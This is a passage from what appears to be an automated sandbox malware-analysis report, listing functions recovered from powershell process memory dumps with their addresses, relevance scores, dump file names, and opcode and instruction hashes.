                              Memory Dump Source
                              • Source File: 00000006.00000002.1330070766.0000000007710000.00000040.00000800.00020000.00000000.sdmp, Offset: 07710000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_7710000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID: r2k
                              • API String ID: 0-1262113257
                              • Opcode ID: 8ab354f6ed4959401868e0b17815085bbcce8e668ae7caefc643a715bcbee4c5
                              • Instruction ID: e2f33de6eadadbb9a035469a3909dded823ec0e27a2040cb64dcbf467f0753e0
                              • Opcode Fuzzy Hash: 8ab354f6ed4959401868e0b17815085bbcce8e668ae7caefc643a715bcbee4c5
                              • Instruction Fuzzy Hash: CA21A7F4A05346CFCB218F2C8854699BBF1BF42290F1A89AAD454CB152E73498C5C7D1
                              Function 07711AD8 Relevance: .6, Instructions: 647COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.1330070766.0000000007710000.00000040.00000800.00020000.00000000.sdmp, Offset: 07710000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_7710000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 72b8d99a696a41747b29205fa201db72624e4b56fc3e308736e7f006fdbd68f1
                              • Instruction ID: 75602568f07313eafb081ab19632a830cdcd177c68fae82923e508a2612e4eb2
                              • Opcode Fuzzy Hash: 72b8d99a696a41747b29205fa201db72624e4b56fc3e308736e7f006fdbd68f1
                              • Instruction Fuzzy Hash: 9E2226B170435A8FC7258B6C881076ABBA3AFC2390F1588AAD645DF252DF35CC46C7A1
                              Function 04F954B0 Relevance: .4, Instructions: 431COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.1326355813.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_4f90000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 18320369329a262dbadf4697b21c0e4d2f80cb38df35ddf3010b221df68de23e
                              • Instruction ID: a594a253eb80252f96803af72f14296e35dd3ec78e1be720f34ac146f2e67e1f
                              • Opcode Fuzzy Hash: 18320369329a262dbadf4697b21c0e4d2f80cb38df35ddf3010b221df68de23e
                              • Instruction Fuzzy Hash: 78021735A01219AFDB05CF98C494AAEFBF2FF48314F248559E845AB361C775ED82CB90
                              Function 07711AB9 Relevance: .1, Instructions: 123COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.1330070766.0000000007710000.00000040.00000800.00020000.00000000.sdmp, Offset: 07710000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_7710000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 04ebeb84c61e785597e6ec8fb2d46010555893a152456f921a58e2a029010a0c
                              • Instruction ID: 4755b41d953bd3835901964105dbf959d09a3c1ccdb9b58814233520fac5e07f
                              • Opcode Fuzzy Hash: 04ebeb84c61e785597e6ec8fb2d46010555893a152456f921a58e2a029010a0c
                              • Instruction Fuzzy Hash: EC41E9F0B0434ADFC7258E6C8510666BBF2AF826D0B9548A5C7048F252EB35D841C7A1
                              Function 04F954A0 Relevance: .1, Instructions: 70COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.1326355813.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_4f90000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 088557eca59108f2bd350a60d7fe0ad9b5d503e96283ff0bb073aae13b6c39a8
                              • Instruction ID: 8b09b3a02471d9e9e69420231d40b735d140bb05c490918baaa751a124feea4d
                              • Opcode Fuzzy Hash: 088557eca59108f2bd350a60d7fe0ad9b5d503e96283ff0bb073aae13b6c39a8
                              • Instruction Fuzzy Hash: D4212675A012499FCB55DF5CC4909AAFBF2FF48310B258199E809EB362C735EC52CBA0
                              Function 04F9426B Relevance: .0, Instructions: 45COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.1326355813.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_4f90000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 52556a8677b8336ca4acde4bb346f6886f17903c49e5c9f01bafc2ccf8c9065f
                              • Instruction ID: b0b2c57ac29f0332d072b37ccea88c7dc33a8e3a6b42bcfa5a2fead4358a869c
                              • Opcode Fuzzy Hash: 52556a8677b8336ca4acde4bb346f6886f17903c49e5c9f01bafc2ccf8c9065f
                              • Instruction Fuzzy Hash: 89014F78B002159FDB04DB98D490AADF7B1FF9E314B248169D95AAB361CA35EC038B60
                              Function 032FD006 Relevance: .0, Instructions: 45COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.1325744153.00000000032FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 032FD000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_32fd000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 40eca1cd2b8201f203c3b4f6d9d1423924b09735614a8fe8a43687f06d03da62
                              • Instruction ID: 171f9cc1e641e796d449e7b6c9b69f037d924dad2ca115c82c2987d9a8dfbfa6
                              • Opcode Fuzzy Hash: 40eca1cd2b8201f203c3b4f6d9d1423924b09735614a8fe8a43687f06d03da62
                              • Instruction Fuzzy Hash: 6C012D7200E3C09FD7128B258894A52BFB4DF43224F1D80DBD9888F2A7C2695849C772
                              Function 032FD01D Relevance: .0, Instructions: 45COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.1325744153.00000000032FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 032FD000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_32fd000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c65970d7930fd61c63cfae910c0a7ebd3f27ca3499eb6d4a0066b983527a9759
                              • Instruction ID: baf1bcc25b5a3681f690093b1860fb4cbb20cc9c281abb3055e4c83e1949aa94
                              • Opcode Fuzzy Hash: c65970d7930fd61c63cfae910c0a7ebd3f27ca3499eb6d4a0066b983527a9759
                              • Instruction Fuzzy Hash: 4201F232015340AFE710CA25DD84B67FF98DF82720F08C47EEE485B24AC2789885CAB1
                              Function 04F94F5E Relevance: .0, Instructions: 29COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.1326355813.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_4f90000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5813ac0871e3fc10b8720cf55886e6fcc9641cc830719b2c711d3ff71719fd87
                              • Instruction ID: e49892839785cd6f9d3487494a658066a7624f2371d131ae64176220f61ab8c4
                              • Opcode Fuzzy Hash: 5813ac0871e3fc10b8720cf55886e6fcc9641cc830719b2c711d3ff71719fd87
                              • Instruction Fuzzy Hash: 9FF0B735A001059FDB15CF9CD990AEEF7B5FF88324F208159E515A73A1C736AC52CB60